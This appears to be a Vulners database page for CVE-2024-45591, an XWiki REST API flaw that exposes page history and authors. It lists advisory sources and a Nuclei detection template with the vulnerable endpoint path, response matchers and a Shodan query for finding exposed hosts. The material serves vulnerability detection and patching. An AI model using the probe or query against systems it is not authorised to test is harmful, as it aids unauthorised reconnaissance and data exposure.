| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2024-45591 | 10 Sep 202419:15 | – | circl | |
| XWiki Platform 安全漏洞 | 10 Sep 202400:00 | – | cnnvd | |
| CVE-2024-45591 | 10 Sep 202415:56 | – | cve | |
| CVE-2024-45591 XWiki Platform document history including authors of any page exposed to unauthorized actors | 10 Sep 202415:56 | – | cvelist | |
| XWiki Platform document history including authors of any page exposed to unauthorized actors | 10 Sep 202415:53 | – | github | |
| CVE-2024-45591 | 10 Sep 202416:15 | – | nvd | |
| XWiki 1.8 < 15.10.9, 16.0.0-rc-1 < 16.3.0 Information Disclosure Vulnerability (GHSA-pvmm-55r5-g3mm) | 11 Sep 202400:00 | – | openvas | |
| CVE-2024-45591 XWiki Platform document history including authors of any page exposed to unauthorized actors | 10 Sep 202415:56 | – | osv | |
| GHSA-PVMM-55R5-G3MM XWiki Platform document history including authors of any page exposed to unauthorized actors | 10 Sep 202415:53 | – | osv | |
| CVE-2024-45591 | 23 May 202510:32 | – | redhatcve |
id: CVE-2024-45591
info:
name: XWiki Platform - Unauthorized Document History Access
author: pd-bot
severity: medium
description: |
A vulnerability in XWiki Platform's REST API allows unauthorized users to access document history information. The REST API endpoint exposes the history of any page including modification times, version numbers, author details (username and display name), and version comments, regardless of access rights configuration, even on private wikis.
impact: |
An attacker can access document history of any known page
remediation: |
Upgrade to XWiki Platform version 15.10.9 or 16.3.0-rc-1 or later. No workarounds are available for earlier versions
reference:
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm
- https://jira.xwiki.org/browse/XWIKI-22052
- https://nvd.nist.gov/vuln/detail/cve-2024-45591
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-45591
cwe-id: CWE-359,CWE-862
epss-score: 0.03417
epss-percentile: 0.87459
cpe: cpe:2.3:a:xwiki:platform:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: xwiki
product: xwiki-platform
shodan-query: http.html:"data-xwiki-reference"
tags: cve,cve2024,xwiki,exposure,rest-api,vuln
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'version'
- 'historySummary'
- 'pageId'
- 'comment'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402204a56d01f90b64d2290ce4157125e4ec51a7a09a50387b555f6b1309aee74c83802202e09b9e5d5bc1534650a7ad676536902995e973f189ad90d3b8441870a7c1fca:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation